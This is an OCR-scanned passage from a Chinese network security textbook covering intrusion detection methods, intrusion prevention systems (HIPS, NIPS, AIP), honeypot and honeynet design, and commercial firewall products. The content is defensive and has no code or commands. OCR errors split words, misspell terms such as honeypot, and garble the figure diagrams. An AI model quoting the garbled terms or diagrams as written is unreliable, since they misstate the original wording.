数据 挖掘 技术 。 

(3) 神经 网 络 方法 具有 自学 习 、 自 适应 能 力 , 可 以 通过 自学 习 提取 正常 的 用 户 或 系统 活 
动 的 特征 模式 , 避 开 选择 统计 特征 这 一 难题 。 

3. 基于 行为 的 检测 方法 

通过 检测 用 户 行为 中 那些 与 已 知 入 侵 行为 模式 类 似 的 行为 .那些 利用 系统 中 缺陷 或 间 


214 网 络 安全 教程 及 实践 


接 违背 系统 安全 规则 的 行为 ,来 判断 系统 中 的 入 侵 活动 。 

目前 基于 行为 的 入 侵 检测 系统 只 是 在 表示 入 侵 模式 (签名 ) 的 方式 以 及 在 系统 的 审计 中 
检查 入 侵 签名 的 机 制 上 有 所 区 别 , 主 要 可 以 分 为 基于 专家 系统 、 基 于 状态 迁移 分 析 和 基于 模 
式 匹 配 等 几 类 。 这 些 方法 的 主要 局 限 在 于 ,只 是 根据 已 知 的 入 侵 序 列 和 系统 缺陷 模式 来 检 
测 系 统 中 的 可 疑 行 为 ,而 不 能 检测 新 的 入 侵 攻 击 行为 以 及 未 知 的 、 潜 在 的 系统 缺陷 。 

入 侵 检 测 方法 虽然 能 够 在 某 些 方面 取得 好 的 效果 ,但 总 体 看 来 各 有 不 足 , 因 而 越 来 越 多 
的 入 侵 检 测 系 统 都 同时 采用 几 种 方法 ,以 互补 不 足 , 共 同 完成 检测 任务 。 


8.6 人 和信 侵 防御 系统 


目前 , 随 着 网 络 入 侵 事 件 的 不 断 增 加 和 黑客 攻击 技术 水 平 的 提高 ,使 得 传统 的 防火 墙 或 
入 侵 检 测 系 统 (IDS) 已 经 无 法 满足 现代 网 络 安全 的 需要 ,而 入 侵 防 御 系 统 (Intrusion 
Prevention System,IPS) 技 术 的 产生 正 是 适应 了 这 种 要 求 。 

防火 墙 是 实施 访问 控制 策略 的 系统 ,对 流 经 的 网 络 流量 进行 检查 ,拦截 不 符合 安全 策略 
的 数据 包 。 入 侵 检测 系统 通过 监视 网 络 或 系统 资源 ,寻找 违反 安全 策略 的 行为 或 攻击 迹象 ， 
并 发 出 报警 。 入 侵 防 御 系 统 是 一 种 主动 的 ,积极 的 入 侵 防 范 及 阻止 系统 , 它 部 署 在 网 络 的 进 
出 口 处 , 当 它 检测 到 攻击 企图 后 ,会 自动 地 将 攻击 包 丢 掉 或 采取 措施 将 攻击 源 阻 断 。IPS 的 
检测 功能 类 似 于 IDS, 但 IPS 检测 到 攻击 后 会 采取 行动 阻止 攻击 ,可 以 说 IPS 是 建立 在 IDS 
发 展 的 基础 上 的 新 生 的 网 络 安全 产品 。 


8.6.1 入 侵 防御 系统 的 工作 原理 


入 侵 防御 系统 提供 积极 主动 防御 ,其 设计 宗旨 是 预先 对 入 侵 活 动 和 攻击 性 网 络 流 进行 
拦截 ,避免 其 造成 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。 入 侵 防 御 系 
统 通 过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ,经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 
内 容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 这 样 一 来 ,有 问题 的 数据 包 , 以 及 所 
有 来 自 同一 数据 流 的 后 续 数 据 包 , 都 能 在 入侵 防御 系统 中 被 清除 掉 。IPS 工作 原理 如 图 8-10 
所 示 。 

t 


_ (@) 大 规模 并 行 深层 检测 
过 滤器 1 命中 ? 
对 数据 5 
包 进行 ) 汪 || 过 滤器? 命中 ? ~( 还 过 或 
分 类 未 通过 
| 一 | 过 滤器 3 命中 ? 
1 bu 相 
-1 1 “二 | 
1 
丢弃 1 1 丢弃 
1 
1 | 一 L 过 滤器 命中 ? | 


图 8-10 ”入侵 防御 系统 原理 
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如 图 8-10 所 示 的 入侵 防御 系统 中 ,在 中 处 ,根据 报头 和 流 信 息 , 每 个 数据 包 都 会 被 分 
类 。 在 处 ,根据 数据 包 的 分 类 ,相关 的 过 滤器 将 被 用 于 检查 数据 包 的 流 状态 信息 。 在昌 
处 ,所 有 相关 过 滤器 都 是 并 行使 用 的 ,如 果 任 何 数据 包 符 合 匹 配 要 求 , 则 该 数据 包 将 被 命中 。 
在 @ 处 ,被 命中 的 数据 包 将 被 丢弃 ,与 之 相关 的 流 状态 信息 也 会 更 新 ,指示 系统 丢弃 该 流 中 
剩余 的 所 有 内 容 。 

IPS 实现 实时 检查 和 阻止 人 侵 的 原理 在 于 IPS 拥有 数目 众多 的 过 滤器 ,能 够 防止 各 种 
攻击 。 当 新 的 攻击 手段 被 发 现 之 后 ,IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引 擎 
是 专业 化 定制 的 集成 电路 ,可 以 深层 检查 数据 包 的 内 容 。 如 果 有 攻击 者 利用 第 二 层 ( 介 质 访 
问 控制 层 ) 至 第 七 层 ( 应 用 层 ) 的 漏洞 发 起 攻击 ,IPS 能 够 从 数据 流 中 检查 出 这 些 攻 击 并 加 以 
阻止 。 传 统 的 防火 墙 只 能 对 网 络 层 或 传输 层 进 行 检 查 , 不 能 检测 应 用 层 的 内 容 。 防 火 墙 的 
包 过 滤 技术 不 会 针对 每 一 字 节 进行 检查 ,因而 也 就 无 法 发 现 攻击 活动 ,而 IPS 可 以 做 到 逐一 
字 节 地 检查 数据 包 。 所 有 流 经 IPS 的 数据 包 都 被 分 类 ,分 类 的 依据 是 数据 包 中 的 报头 信息 ， 
如 源 IP 地 址 和 目的 IP 地 址 、 端 口号 和 应 用 域 。 每 种 过 滤器 负责 分 析 相 对 应 的 数据 包 。 通 
过 检查 的 数据 包 可 以 继续 前 进 , 包 含 恶 意 内 容 的 数据 包 就 会 被 丢弃 ,被 怀疑 的 数据 包 需 要 接 
受 进一步 的 检查 。 

针对 不 同 的 攻击 行为 ,IPS 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 过 滤 规 则 ,为 
了 确保 准确 性 ,这 些 规则 的 定义 非常 广泛 。 在 对 传输 内 容 进行 分 类 时 ,过滤 引 擎 还 需要 参照 
数据 包 的 信息 参数 ,并 将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 , 以 提高 过 滤 准 确 性 。 

过 滤器 引擎 集合 了 流水 和 大 规模 并 行 处 理 硬件 ,能 够 同时 执行 数 千 次 的 数据 包 过 滤 检 
查 。 并 行 过 滤 处 理 可 以 确保 数据 包 能 够 不 间断 地 快速 通过 系统 ,不 会 对 速度 造成 影响 。 这 
种 硬件 加 速 技术 对 于 IPS 具有 重要 意义 ,因为 传统 的 软件 解决 方案 必须 串 行进 行 过 滤 检 查 ， 
会 导致 系统 性 能 大 打折 扣 。 


8.6.2 入 侵 防 御 系 统 的 种 类 


入 侵 防 御 系 统 可 分 为 基于 主机 的 入 侵 防御 (HIPS) 、 基 于 网 络 的 入 侵 防御 (NIPS) 和 基 
于 应 用 的 入 侵 防 御 (AIP)。 

1. 基于 主机 的 入 侵 防 御 

HIPS 通过 在 主机 /服务 器 上 安装 软件 代理 程序 ,防止 网 络 攻击 入 侵 操作 系统 以 及 应 用 
程序 。 基 于 主机 的 入 侵 防 御 技 术 可 以 根据 自 定义 的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 服 
务 器 、 主 机 发 起 的 恶意 入 侵 。HIPS 可 以 阻 断 缓冲 区 溢出 、 改 变 登 录 口令 、 改 写 动 态 链 接 库 
以 及 其 他 试图 从 操作 系统 夺取 控制 权 的 入 侵 行为 ,整体 提升 主机 的 安全 水 平 。 

在 技术 上 ,HIPS 采用 独特 的 服务 器 保护 途径 ,利用 由 包 过 滤 、 状 态 包 检测 和 实时 人 侵 
检测 组 成 的 分 层 防 御 体 系 。 这 种 体系 能 够 在 提供 合理 吞吐 率 的 前 提 下 ,最 大 限度 地 保护 服 
务 器 的 敏感 内 容 , 既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 系统 的 调用 当中 ,通过 拦截 针对 
操作 系统 的 可 疑 调 用 ,提供 对 主机 的 安全 防御 ; 也 可 以 以 更 改 操作 系统 内 核 程序 的 方式 , 提 
供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 ., 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 诸如 缓冲 区 溢出 之 类 的 已 知 攻 击 ,还 能 够 防范 未 知 攻击 .防止 针对 Web 页 面 \ 应 用 和 资源 
的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ,不 同 的 平 
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台 需 要 不 同 的 软件 代理 程序 。 

2. 基于 网 络 的 入 侵 防 御 

NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 的 安全 保护 。 由 于 它 采 用 在 线 连 接 
方式 ,所 以 一 旦 辨识 出 入 侵 行为 , NIPS 就 可 以 去 除 整 个 网 络 会 话 ,而 不 仅仅 是 复位 会 话 。 
同样 由 于 实时 在 线 ,NIPS 需要 具备 很 高 的 性 能 ,以 免 成 为 网 络 的 瓶颈 ,因此 NIPS 通常 被 设 
计 成 类 似 于 交换 机 的 网 络 设备 ,提供 线 速 吞吐 速率 以 及 多 个 网 络 端口 。 

NIPS 必须 基于 特定 的 硬件 平台 ,才能 实现 千 兆 级 以 上 的 网 络 流量 的 深度 数据 包 检 测 
和 阻 断 功能 。 这 种 特定 的 硬件 平台 通常 可 以 分 为 三 类 : 一 类 是 网 络 处 理 器 (网 络 芯片 ) ,一 
类 是 专用 的 FPGA 编程 芯片 ,第 三 类 是 专用 的 ASIC 芯 

在 技术 上 ,NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技 术 ,包括 特征 匹配 .协议 分 析 和 异常 检 
测 。 特 征 匹配 是 应 用 最 广泛 的 技术 ,具有 准确 率 高 .速度 快 的 特点 。 基 于 状态 的 特征 匹配 不 
但 要 检测 攻击 行为 的 特征 ,还 要 检查 当前 网 络 的 会 话 状态 ,避免 受到 欺骗 攻击 。 协 议 分 析 是 
一 种 较 新 的 人 侵 检测 技术 , 它 充 分 利用 网 络 协议 的 高 度 有 序 性 ,并 结合 高 速 数据 包 捕 捉 和 协 
议 分 析 , 来 快速 检测 某 种 攻击 特征 。 协 议 分 析 正 在 逐渐 进入 成 熟 应 用 阶段 。 协 议 分 析 能 够 
理解 不 同 协议 的 工作 原理 ,以 此 分 析 这 些 协 议 的 数据 包 , 来 寻找 可 疑 或 不 正常 的 访问 行为 。 
通过 协议 分 析 ,IPS 能 够 针对 插入 (Insertion ) 与 规避 (Evasion) 攻 击 进行 检测 。 蜡 常 检测 的 
误 报 率 比 较 高 ,NIPS 不 将 其 作为 主要 技术 。 

3. 应 用 入 侵 防御 

NIPS 产品 有 一 个 特例 , 即 应 用 入 侵 防 御 (Application Intrusion Prevention,AIP) , 它 把 
基于 主机 的 入 侵 防御 扩展 成 为 位 于 应 用 服务 器 之 前 的 网 络 设备 。AIP 被 设计 成 一 种 高 性 能 
的 设备 ,配置 在 应 用 数据 的 网 络 链 路 上 ,以 确保 用 户 遵 守 设 定好 的 安全 策略 ,保护 服务 器 的 
安全 。NIPS 工作 在 网 络 上 ,直接 对 数据 包 进 行 检测 和 阻 断 ,与 具体 的 主机 /服务 器 操作 系 
统 平台 无 关 。 


8.6.3 入 侵 防 御 系 统 的 技术 特征 


入 侵 防 御 系 统 的 技术 特征 包括 嵌入 式 运 行 、 深 入 分 析 和 控制 .入 侵 特征 库 和 高 效 处 理 
能 力 。 

1. 嵌入 式 运行 

只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 ,实时 阻拦 所 有 可 疑 的 数 
据 包 ,并 对 该 数据 流 的 剩余 部 分 进行 拦截 。 

2. 深入 分 析 和 控制 

IPS 必须 具有 深入 分 析 能 力 .以 确定 哪些 恶意 流量 已 经 被 拦截 ,根据 攻击 类 型 .策略 等 
来 确定 哪些 流量 应 该 被 拦截 。 

3. 入 侵 特 征 库 

高 质量 的 入 侵 特征 库 是 IPS 高 效 运行 的 必要 条 件 ,IPS 还 应 该 定期 升级 入 侵 特征 库 , 并 
快速 应 用 到 所 有 传感器 。 

4. 高 效 处 理 能 力 

IPS 必须 具有 高 效 处 理 数 据 包 的 能 力 ,对 整个 网 络 性 能 的 影响 保持 在 最 低 水 平 。 
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8.7 蜜 饼 及 蜜 网 技术 


8.7.1 误 缸 及 密 网 的 概念 


入 侵 诱 骗 技 术 是 相对 传统 入 侵 检测 技术 更 为 主动 的 一 种 安全 技术 ,主要 包括 蜜 钠 
(Honeypot) 和 蜜 网 (Honeynet) 两 种 。 它 是 用 特有 的 特征 吸引 攻击 者 ,同时 对 攻击 者 的 各 种 
攻击 行为 进行 分 析 , 并 找到 有 效 的 对 付 方法 。 为 了 吸引 攻击 者 ,网 络 管理 员 通 常 还 在 
Honeypot 上 故意 留 下 一 些 安全 后 门 ,或 者 放置 一 些 攻击 者 希望 得 到 的 敏感 信息 ,当然 这 些 
信息 都 是 虚假 的 。 当 入 侵 者 正 为 攻 入 目标 系统 而 沾沾自喜 时 ,殊不知 自己 在 目标 系统 中 的 
所 作 所 为 ,包括 输入 的 字符 、 执 行 的 操作 等 都 已 经 被 Honeypot 所 记录 。 

1. 密 缸 技术 

蜜 缸 (Honeypot) 技 术 通过 一 个 由 网 络 安全 专家 精心 设置 的 特殊 系统 来 引诱 黑客 ,并 对 
黑客 进行 跟踪 和 记录 。 其 最 重要 的 功能 是 特殊 设置 的 对 于 系统 中 所 有 操作 的 监视 和 记录 ， 
网 络 安全 专家 通过 精心 的 伪装 使 得 黑客 在 进入 到 目标 系统 后 , 仍 不 知晓 自己 所 有 的 行为 已 
处 于 系统 的 监视 之 中 。 

首先 ,比较 一 下 一 个 具有 蜜 饶 的 系统 和 一 个 没有 任何 防范 措施 的 系统 的 区 别 ,虽然 这 两 
者 都 有 可 能 被 入 侵 破 坏 , 但 是 本 质 却 完全 不 同 , 蜜 饶 是 网 络 管理 员 经 过 周密 布置 而 设 下 的 
“黑匣子 ”, 看 似 漏洞 百出 却 尽 在 掌握 之 中 , 它 收 集 的 入 侵 数据 十 分 有 价值 ; 而 后 者 实际 上 即 
使 被 人 侵 也 不 一 定 能 查 到 痕迹 。 因 此 , 蜜 饶 的 定义 是 : 蜜 钢 是 一 个 安全 资源 , 它 的 价值 在 于 
被 探测 攻击 和 损害 。 

设计 蜜 饶 的 初衷 就 是 让 黑客 和 人 侵 , 借 此 收集 证 据 , 同 时 隐藏 真实 的 服务 器 地 址 ,因此 ,对 
于 一 台 合格 的 蜜 缸 来 说 ,应 该 拥有 以 下 的 功能 : 发 现 攻击 ,产生 警告 ,强大 的 记录 能 力 , 欺 
骗 , 协 助 调查 。 另 外 一 个 功能 由 管理 员 去 完成 , 那 就 是 在 必要 时 根据 蜜 饶 收 集 的 证 据 来 起 诉 
人 和 人 侵 者 。 如 图 8-11 所 示 为 蜜 钠 的 防护 原理 ,如 图 8-12 所 示 为 蜜 钠 的 体系 框架 。 

网 关 重 定向 器 。“” 密 镶 1 


关键 服务 器 1 


关键 服务 器 2 


图 8-11 密 缸 的 防护 原理 


蜜 饶 并 不 修正 任何 问题 ,它们 仅 提 供 额外 的 有 价值 的 信息 。 所 以 说 Honeypot 并 非 是 
一 种 安全 的 解决 方案 ,这 是 因为 它 并 不 会 "修理 ?任何 错误 。 它 只 是 一 种 工具 ,如 何 使 用 这 个 
工具 取决 于 用 户 想 做 什么 。Honeypot 可 以 对 其 他 系统 和 应 用 进行 仿真 ,创建 一 个 监禁 环境 
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内 部 主机 内 部 主机 


好 日 


内 部 主机 ”内 部 服务 器 柯 下 
蜜 网 ethl | Honey wall 日 志 服务 器 


( | S 

> < 8 

密 铅 主机 蜜 负 主机 密 铅 主机 
图 8-12 ” 密 钠 的 体系 框架 


将 攻击 者 困 在 其 中 。 无 论 用 户 如 何 建立 和 使 用 Honeypot, 只 有 Honeypot 受到 攻击 时 , 它 
的 作用 才能 发 挥 出 来 。 所 以 为 了 方便 攻击 ,一 般 是 将 Honeypot 设置 成 域名 服务 器 Web 或 
电子 邮件 转发 服务 等 流行 应 用 中 的 一 种 。 

蜜 饶 的 特点 主要 有 两 个 : 首先 , 蜜 饶 技 术 不 是 一 个 单一 的 技术 或 设备 ,而 是 一 个 安全 的 
网 络 系统 ,是 一 种 高 度 相互 作用 的 Honeypot, 在 该 系统 中 , 装 有 多 个 系统 和 应 用 软件 ; 其 
次 ,所 有 放置 在 蜜 钠 网 内 的 系统 都 是 标准 的 产品 系统 , 即 真实 的 系统 和 应 用 软件 ,都 不 是 仿 
效 的 。 

密 铅 主要 有 以 下 几 种 类 型 。 

1) 实 系统 蜜 饶 

实 系 统 蜜 挫 即 为 真实 的 蜜 铅 , 其 上 运行 着 真实 的 系统 ,并 且 具 备 真实 的 可 被 入 侵 的 漏 
洞 ,这 些 漏 洞 具 有 一 定 的 危险 性 ,但 可 以 记录 下 真实 的 人 侵 信息 。 这 种 蜜 钢 安装 的 系统 一 般 
都 采用 较 老 版 本 的 操作 系统 ,不 安装 任何 补丁 ,或 者 根据 管理 员 需 要 ,象征 性 地 补 上 了 一 些 
简单 的 漏洞 ,但 预 留 一 些 较为 复杂 的 漏洞 ,这样 伪 装 起 来 更 像 真 实 的 系统 。 设 置 完成 后 ,将 
该 蜜 饶 系统 接 人 网 络 , 即 完成 了 一 个 实 系统 蜜 饶 的 部 署 。 根 据 目前 的 网 络 扫描 频繁 度 来 看 ， 
这 样 的 蜜 缸 很 快 就 能 吸引 到 目标 并 接受 攻击 ,系统 运行 着 的 记录 程序 会 记 下 入 侵 者 的 一 举 
一 动 。 但 这 种 蜜 钠 系 统 有 一 定 的 危险 性 ,因为 人 侵 者 的 每 一 次 入 侵 都 会 引起 系统 真实 的 反 
应 ,例如 被 溢出 渗透、 夺取 权限 等 ,从 而 导致 蜜 饶 系 统 失效 。 

2) 伪 系 统 蜜 钠 

伪 系 统 蜜 钠 也 是 建立 在 真实 系统 基础 上 的 ,但 是 它 与 实 系统 蜜 缸 的 最 大 区 别 就 是 “平台 
与 漏洞 非 对 称 性 ”。 

众所周知 ,除了 Windows 操作 系统 以 外 ,还 有 Linux、UNIX、OS2 等 操作 系统 ,各 种 操 
作 系 统 的 核心 不 同 ,产生 的 漏洞 缺陷 也 就 不 尽 相同 , 即 很 少 有 能 同时 攻击 几 种 系统 的 漏洞 代 
码 。 例 如 ,攻击 者 可 以 用 LSASS 溢出 漏洞 得 到 Windows 的 权限 ,但 是 无 法 用 同样 的 手法 去 
进行 Linux 的 溢出 攻击 。 根 据 这 种 特性 ,就 产生 了 “ 伪 系 统 蜜 钢 ”, 它 利用 一 些 工具 程序 强大 
的 模仿 能 力 ,伪造 出 不 属于 自己 平台 的 “漏洞 ”, 入 侵 这 样 的 “漏洞 ”, 几乎 是 不 可 能 的 一 一 因 
为 系统 本 来 就 没有 让 这 种 漏洞 成 立 的 条 件 ,这 样 就 大 大 提高 了 蜜 饶 系 统 抗 攻击 的 能 力 。 伪 
系统 蜜 缸 实现 相对 简单 ,采用 Windows 平台 下 的 一 些 虚拟 机 程序 、Linux 自身 的 脚本 功能 
加 上 第 三 方 工具 即 可 ,甚至 在 Linux/UNIX 下 还 能 实时 由 管理 员 产 生 一 些 根本 不 存在 的 
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“漏洞 ,引诱 人 侵 者 进行 攻击 。 在 这 种 系统 中 ,实现 跟踪 记录 也 很 容易 ,只 要 在 后 台 开 着 相 
应 的 记录 程序 即 可 。 

伪 蜜 钠 系 统 的 优点 主要 体现 在 : 它 可 以 最 大 程度 地 防止 被 入 侵 者 破坏 ,也 能 模拟 不 存 
在 的 漏洞 ,例如 可 以 让 一 些 Windows 蠕虫 攻击 Linux 系统 (当然 需要 在 Linux 系统 中 模拟 
出 符合 条 件 的 Windows 特征 )。 其 缺点 在 于 : 如 果 设 计 不 够 精密 ,入 侵 者 很 容易 识破 伪装 ， 
且 这 种 方式 对 于 脚本 的 编写 要 求 较 高 。 

2. 蜜 网 技术 

蜜 网 (Honeynet) 是 一 种 特殊 的 Honeypot, Honeypot 物理 上 通常 是 一 台 运 行 单个 操作 
系统 或 者 借助 于 虚拟 化 软件 运行 多 个 虚拟 操作 系统 的 “牢笼 主机。 单机 蜜 饶 系 统 最 大 的 缺 
陷 在 于 数据 流 将 直接 进入 网 络 ,管理 者 难以 控制 蜜 缸 主机 外 出 流量 ,入 侵 者 容易 利用 蜜 饶 主 
机 作为 跳板 来 攻击 其 他 机 器 。 解 决 这 个 问题 的 方法 是 把 蜜 缸 主机 放置 在 防火 墙 的 后 面 , 所 
有 进出 网 络 的 数据 都 会 通过 这 里 ,并 可 以 控制 和 捕获 这 些 数 据 , 这 种 网 络 诱骗 环境 称 为 蜜 网 
(Honeynet) 。 

蜜 网 作为 蜜 饶 技 术 中 的 高 级 工具 ,一般 是 由 防火 墙 . 路 由 器 .入 侵 检 测 系统 以 及 一 台 纪 
多 台 蜜 饶 主 机 组 成 的 网 络 系统 ,也 可 以 使 用 虚拟 化 软件 来 构建 虚拟 蜜 网 。 相 对 于 单机 蜜 饶 ， 
蜜 网 实现 ,管理 起 来 更 加 复杂 ,但 是 这 种 多 样 化 的 系统 能 够 更 多 地 揭示 入 侵 者 的 攻击 特性 ， 
极 大 地 提高 蜜 饶 系 统 的 检测 、 分 析 、 响 应 和 恢复 受 侵 害 系 统 的 能 力 。 

在 蜜 网 中 ,防火 墙 的 作用 是 限制 和 记录 网 络 数据 流 , 入 侵 检测 系统 通常 用 于 观察 潜在 的 
攻击 和 译 码 , 并 在 系统 中 存储 网 络 数 据 流 。 蜜 网 中 装 有 多 个 操作 系统 和 应 用 程序 供 安 全 
探测 和 攻击 。 特 定 的 攻击 者 会 瞄准 特定 的 系统 或 漏洞 ,通过 部 署 不 同 的 操作 系统 和 应 用 
程序 ,可 以 更 准确 地 了 解 安 全 的 攻击 趋势 和 特征 。 另 外 ,所 有 放置 在 蜜 网 中 的 系统 都 是 
真实 的 系统 ,没有 模拟 的 环境 或 故意 设置 的 漏洞 。 而 且 利用 防火 墙 或 路 由 器 的 功能 ,能 
在 网 络 中 建立 相应 的 重 定向 机 制 ,将 入 侵 者 或 可 疑 的 连接 主动 引入 蜜 网 ,可 以 提高 蜜 网 
的 运行 效率 。 

图 8-13 是 一 个 蜜 网 系统 的 结构 图 。 
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图 8-13 一 个 蜜 网 系统 的 结构 图 
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图 中 包括 三 个 不 同 的 网 络 : Honeynet\ 管 理 网 络 和 Internet。 其 中 ,日 志 / 告 警 服务 器 、 
IDS 与 防火 墙 组 成 管理 网 络 ,Solaris 服务 器 、Windows 2003 服务 器 .Linux 服务 器 .日 志 服 
务 器 和 交换 机 组 成 蜜 网 。 在 该 系统 中 ,防火 墙 .IDS 和 蜜 缸 主机 的 系统 负责 日 志 的 捕获 。 因 
为 手段 高 明 的 入侵 者 攻 和 系统 后 ,通常 会 试图 更 改 甚至 销毁 目标 主机 上 易于 暴露 人 侵 行 为 
的 各 种 记录 。 蜜 网 在 确保 不 被 入 侵 者 发 现 诱骗 的 前 提 下 ,会 尽 可 能 多 地 捕获 攻击 行为 信息 ， 
包括 所 有 的 按键 记录 、CPU 的 使 用 率 或 者 进程 列表 、 使 用 过 的 各 种 协议 数据 包 内 容 等 ,同时 
要 注意 充分 保证 捕获 信息 的 完整 和 安全 。 防 火 墙 在 IP 层 记录 所 有 进出 蜜 网 的 连接 ,设计 为 
允许 所 有 进入 的 连接 ,但 是 对 从 Honeynet 向 Internet 发 起 的 连接 进行 跟踪 ,一旦 Honeynet 
达到 了 规定 的 向 外 的 连接 数 ,防火 墙 将 阻 断 任何 后 续 的 连接 ,并 且 及 时 向 系统 管理 员 发 出 警 
告 信息 ; IDS 在 数据 链 路 层 对 蜜 网 中 的 网 络 数据 流 进行 监控 ,分 析 和 抓 取 数据 流 信息 ,以 便 
将 来 能 够 重 现 攻 击 行为 ,同时 在 发 现 可 疑 举动 时 报警 。 蜜 钠 主 机 除了 使 用 操作 系统 自身 提 
供 的 日 志 功 能 外 ,还 可 以 利用 第 三 方 软件 加 强 日 志 功 能 ,并 且 传 输 到 安全 级 别 更 高 的 远程 日 
志 服 务 器 上 备份 。 


8.7.2 ” 密 钠 系统 中 采用 的 主要 技术 


1. 网 络 欺骗 技术 

为 了 使 蜜 缸 对 入 侵 者 更 有 吸引 力 ,通常 应 采用 各 种 欺骗 手段 。 例 如 ,在 欺骗 主机 上 模拟 
一 些 操作 系统 .一 些 网络 攻击 者 最 “喜欢 ”的 端口 和 各 种 认为 有 入 侵 可 能 的 漏洞 等 。 

2. 端口 重 定向 技术 

端口 重 定向 技术 ,可 以 在 工作 系统 中 模拟 一 个 非 工作 服务 。 例 如 ,在 网 络 中 正常 使 用 了 
Web 服务 (80 端口 ) ,此 时 将 Telnet(23 端口 ) 和 FTP(21 端口 ) 服 务 重 定向 到 蜜 饶 系 统 中 ， 
这 两 个 服务 实际 上 是 没有 开启 的 ,但 攻击 者 在 进行 扫描 时 则 发 现 这 两 个 端口 是 开放 的 ,实际 
上 这 两 个 端口 是 Honeynet 虚拟 出 来 的 ,对 其 攻击 则 不 会 造成 危害 。 

3. 攻击 (入 侵 ) 报 警 和 数据 控制 

蜜 钠 系 统 本 身 就 可 以 模拟 成 一 个 操作 系统 ,可 以 把 其 本 身 设 定 成 为 易 攻 破 的 一 台 主 机 ， 
即 开放 一 些 端口 并 设置 弱 口 令 等 ,并 设 定 出 相应 的 回应 程序 ,如 Linux 中 的 Shell 和 FTP 程 
序 , 当 攻击 者 “入 侵 ” 进 入 系统 (Honeynet 虚拟 出 来 的 系统 ) 后 ,就 相当 于 攻击 者 进入 一 个 设 
定 的 “陷阱 ,那么 攻击 者 所 做 的 一 切 都 在 其 监视 之 中 ,攻击 者 的 行为 可 以 是 : Telnet 密码 暴 
力 破解 .添加 新 用 户 、 权 限 提 升 ` 删 除 / 添 加 文件 等 。 还 可 以 给 入 侵 者 一 个 网 络 连 接 , 允 许 其 
进行 网 络 数据 传输 ,并 可 以 作为 跳板 进行 其 他 攻击 ,以 更 真实 地 迷惑 攻击 者 。 

4. 数据 捕获 技术 

在 攻击 者 入 侵 的 同时 , 蜜 缸 系统 将 记录 攻击 者 的 输入 /输出 信息 、 键 盘 记 录 信 息 、 屏 幕 信 
息 以 及 攻击 者 启动 的 进程 和 使 用 过 的 工具 ,分 析 攻 击 者 所 要 进行 的 下 一 步 操作 。 对 于 捕获 
的 数据 ,应 存放 在 安全 的 服务 器 中 ,不 应 存放 在 Honeynet 主机 上 ,防止 被 攻击 者 发 现 ,以 免 
被 攻击 者 觉察 到 是 一 个 “陷阱 ”而 提前 退出 。 
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8.8 常见 的 防火 墙 产品 和 入 侵 检 测 产 品 
8.8.1 防火 墙 产品 


I, PIX 

美国 Cisco 公司 是 世界 上 占领 先 地 位 的 提供 网 络 技术 和 产品 的 厂商 ,近年 来 , 它 以 PIX 
防火 墙 系列 作为 一 种 理想 的 解决 网 络 安全 的 产品 。PIX 防火 墙 的 内 核 采 用 的 是 基于 适用 
安全 策略 的 保护 机 制 ,把 内 部 网 络 和 未 经 认证 的 用 户 完全 隔离 。 每 当 一 个 内 部 网 络 的 用 
户 访问 Internet, PIX 防火 墙 从 用 户 的 了 P 数 据 包 中 务 下 IP 地 址 ,用 一 个 存储 在 PIX 防火 
墙 内 已 经 登记 的 有 效 IP 地 址 替代 它 , 把 真正 的 IP 隐藏 起 来 。PIX 防火 墙 还 具有 审计 日 
志 功 能 ,并 支持 SNMP, 用 户 可 以 利用 防火 墙 系统 包含 的 实时 报警 功能 的 网 络 浏览 器 产生 
报警 。 

用 户 未 认证 前 ,PIX 防火 墙 使 用 cut-through 作为 代理 防火 墙 服务 器 ,工作 在 应 用 层 。 
但 是 用 户 一 旦 被 认证 ,PIX 防火 墙 就 会 切换 会 话 流 和 所 有 的 通信 流量 ,保持 会 话 状态 的 双方 
就 会 快速 和 直接 地 进行 通信 。 因 此 ,PIX 防火 墙 获 得 了 极 高 的 性 能 。cut-through 处 理 速度 
比 代理 服务 器 快 得 多 。PIX 防火 墙 采用 了 增强 的 多 媒体 使 用 安全 策略 。 应 用 了 PIX 防火 
墙 的 网 络 , 就 不 再 需要 特殊 的 客户 设置 。 

2. NetScreen 

NetScreen 公司 的 NetScreen 防火 墙 产 品 是 一 种 网 络 安全 硬件 产品 。 该 产品 完全 基于 
硬件 ASIC 芯片 ,就 像 一 个 盒子 一 样 ,安装 使 用 都 很 简单 ,同时 它 还 是 集 防 火 墙 `VPN \ 流 量 
控制 功能 于 一 体 的 网 络 产品 。NetScreen 防火 墙 将 防火 墙 、. 虚 拟 专用 网 .网 络 流量 控制 和 宽 
带 等 这 些 功能 全 部 集成 在 专 有 一 体 化 的 硬件 中 , 它 的 配置 可 以 在 网 络 上 任何 一 台 带 有 浏览 
器 的 机 器 上 完成 。NetScreen 的 优势 之 一 是 采用 了 新 的 体系 结构 ,可 以 有 效 地 消除 传统 防 
火 墙 实现 数据 加 密 时 的 性 能 瓶颈 ,能 实现 最 高 级 别 的 IP 安全 保护 。 

3.CheckPoint 软件 防火 墙 

CheckPoint 是 美国 一 家 大 型 软件 公司 ,曾经 率先 提出 安全 企业 连接 开放 平台 (OPSEC) 
概念 ,为 计算 机 提供 了 第 一 个 企业 安全 结构 。 该 公司 开发 的 软件 防火 墙 CheckPoint 
Firewall-1 是 一 个 综合 的 ,模块 化 的 安全 产品 ,基于 策略 的 解决 方案 能 够 让 管理 员 指 定 网 络 
访问 时 按 部 署 的 时 间 段 进行 控制 , 它 能 够 将 处 理 任务 分 散 到 一 组 工作 站 上 ,从 而 减轻 相应 防 
火 墙 服务 器 .工作站 的 负担 。 

